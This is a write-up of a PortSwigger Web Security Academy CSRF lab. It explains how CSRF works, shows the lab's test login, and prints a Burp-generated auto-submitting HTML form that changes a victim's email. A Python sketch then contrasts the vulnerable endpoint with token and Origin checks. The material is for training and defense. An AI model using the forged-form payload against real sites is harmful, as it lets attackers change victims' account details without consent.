CSRF - APPRENTICE
tags: Portswigger Web Security Academy
Web
[TOC]
Lab: CSRF vulnerability with no defenses
- Description: This lab’s email change functionality is vulnerable to CSRF.
- Goal: To solve the lab, craft some HTML that uses a CSRF attack to change the viewer’s email address and upload it to your exploit server.
You can log in to your own account using the following credentials:
wiener:peter
- Hint: You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.
Background
:::spoiler How a CSRF attack works (from "[Day25] - Web series for beginners: CSRF")
- The user logs in to a website.
- After authentication, the user's browser holds a session cookie for that site.
- The user clicks a link containing malicious code, or directly visits a third-party website, and loads a page containing the following HTML:
`<img src=http://www.***.com/transfer.php?id=5&money=22>`
- The malicious code issues the request with the user's identity, i.e. it performs CSRF.
- The user's account loses money QQ

Common CSRF methods
- HTML tags
`<img>` tag attribute: `<img src="malicious link">`
Requests the third-party site with GET; the browser attaches the user's cookie to that GET request.
`<script>` tag attribute: `<script src="malicious link">`
`<iframe>` tag attribute: `<iframe src="malicious link">`
:::
Recon
- According to the description, the email change function is vulnerable to CSRF. So I can log in with the username and password they provided.
- Find where the CSRF is: I then tried to change my email and trace the packet.
- Then we can forge a website and have our victim access it. In this lab, PortSwigger provides an exploit server that simulates a victim visiting the page.
Exp
Directly create the CSRF PoC with Burp Suite
Exploit Payload:
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a050071049c31f4815898e900330005.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="danger@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
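The PoC works only because the change-email endpoint trusts the session cookie alone. As an added example (not part of the lab or of this write-up's original content), the following Python models that endpoint twice: once as the lab has it, and once with the two checks the lab is missing, a per-session synchronizer token and an Origin header check. The session store, origins and request dicts are constructed stand-ins, not the lab's real values.

```python
import hmac
import secrets

# Constructed stand-in for the lab's session store: session cookie -> account record.
# "csrf" is the per-session synchronizer token the lab's real endpoint does not have.
SESSIONS = {
    "sess-wiener": {"user": "wiener", "email": "wiener@normal-user.net",
                    "csrf": secrets.token_hex(16)},
}
SITE_ORIGIN = "https://lab.example"         # placeholder for the lab's own origin
EXPLOIT_ORIGIN = "https://exploit.example"  # placeholder for the exploit server


def change_email_no_defenses(req):
    """Mirrors the lab endpoint: any POST carrying a valid session cookie is honoured."""
    sess = SESSIONS.get(req["cookies"].get("session"))
    if sess is None:
        return 401, "not logged in"
    sess["email"] = req["form"]["email"]
    return 302, "redirect to /my-account"


def change_email_hardened(req):
    """Same endpoint with two independent checks a third-party page cannot satisfy."""
    sess = SESSIONS.get(req["cookies"].get("session"))
    if sess is None:
        return 401, "not logged in"
    # 1. Synchronizer token: unguessable, bound to the session and only rendered into
    #    the site's own forms, so an auto-submitting form on another origin lacks it.
    sent = req["form"].get("csrf", "")
    if not hmac.compare_digest(sent.encode(), sess["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    # 2. Origin header: browsers add it to cross-site POSTs; any value other than
    #    the site's own origin means the form was submitted from elsewhere.
    if req["headers"].get("Origin") != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    sess["email"] = req["form"]["email"]
    return 302, "redirect to /my-account"


def forged_request():
    """What the auto-submitting PoC form above produces in the victim's browser:
    cookie attached automatically, no token, Origin of the exploit server."""
    return {"cookies": {"session": "sess-wiener"},
            "headers": {"Origin": EXPLOIT_ORIGIN},
            "form": {"email": "danger@gmail.com"}}


def legitimate_request(new_email):
    """A submission from the site's own my-account page, token included."""
    return {"cookies": {"session": "sess-wiener"},
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"email": new_email, "csrf": SESSIONS["sess-wiener"]["csrf"]}}
```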
:::spoiler Success Screenshot
:::
Reference
- Burp Suite Security Academy Writeup: Mastering CSRF from 0 to 1 (从0到1完全掌握 CSRF)
- Lab: CSRF vulnerability with no defenses - write up